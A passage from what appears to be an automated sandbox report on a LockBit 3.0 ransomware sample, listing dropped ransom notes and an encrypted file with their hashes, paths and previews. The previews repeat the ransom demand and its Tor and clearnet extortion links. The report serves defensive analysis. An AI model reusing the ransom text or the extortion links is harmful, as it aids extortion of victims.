browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.978767831415341
                Encrypted:false
                SSDEEP:192:VQE6H2cavY0JzciQ2eYfTwl9UISsNeNArp05lO3o:xwcv7wiQ2eYMvU5yre5M4
                MD5:8E06E3000D71CDC47C4668C2C1C1B8B7
                SHA1:BCB088FE06BABA831D16BCC8D6D2CB980383A368
                SHA-256:D2E1C1D5F69705BDB73227F666AB71C6FD2F14A1D91EDD8499F9597F4F9A0743
                SHA-512:CF301C2B37EF37ADDD1FBE2BEB477B806F343C68E105AFE46E5E46484326E19FCC356DD55F84BFAD8C6BBAA15148E15673BB56D2A7D88FCC2CD201EE0264FC01
                Malicious:false
                Preview:h....!..q|c."..L.a$..E.S...9..}'.o..8t.i.Pn...O$.b....V6.IaV%..+..v_Xx.[m...].f...-......P.]u....5<U.."..}...A.a/.!&.1g..7e.5Q...L..!...|...L.E}...0..=.....[~k.=.`.B..[..UQ`...WOJy~.a....mf.HL.\%sz$..la.1.D...o..<KE.*.Gu..N.. ..R.I[..(......s2<..Z..4<..v..)F.....7.{.rN5Z8.pK.....s..7o..83(.{.4...-..I.c.C.qM...7.vDg.~.zM.W..h..4V$..:....../J....n..SJOF.F.zUp\Bi......Rn..0....Z...*V.R=...J..y..).....yM.$...d4m7K.T4U.r._.A...;.[.].+.IGQ5.......jP.......N.F.|.|..DC.X..*.v.zt.....vg.5..yi..&.f`}..#..9...J.ow...ZcBc\H.1m.w%k..^.t}..3'.J..o..y...Z.DX.e0k.}4.....\.9..3*,......;....S$.].y+e.E.*.1..7.x..aC.......)..[.I..>u..{,JUx..|A.o.....43kQ]..ta.....t$Z..S..%n.n.)...!p.L9.......I.>,..O4.gmQtH*..+..........-{.E..8.$(..i..MbF.@.....E..w..*"\P...B.XA7l:.@T..g.OM0..C.r.;|.L.\...=jq.#...4.,.t..?..B.....s...F...=..8T1-..R..E.?.o.T..(._..;....U..{!d|..(\T..OWn. m.....\..yA......E.U..P.o..tip.d..?.0;$.n-..{f.lj...`).m.g.....(.X.^.E.....b.f.!.]..7

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
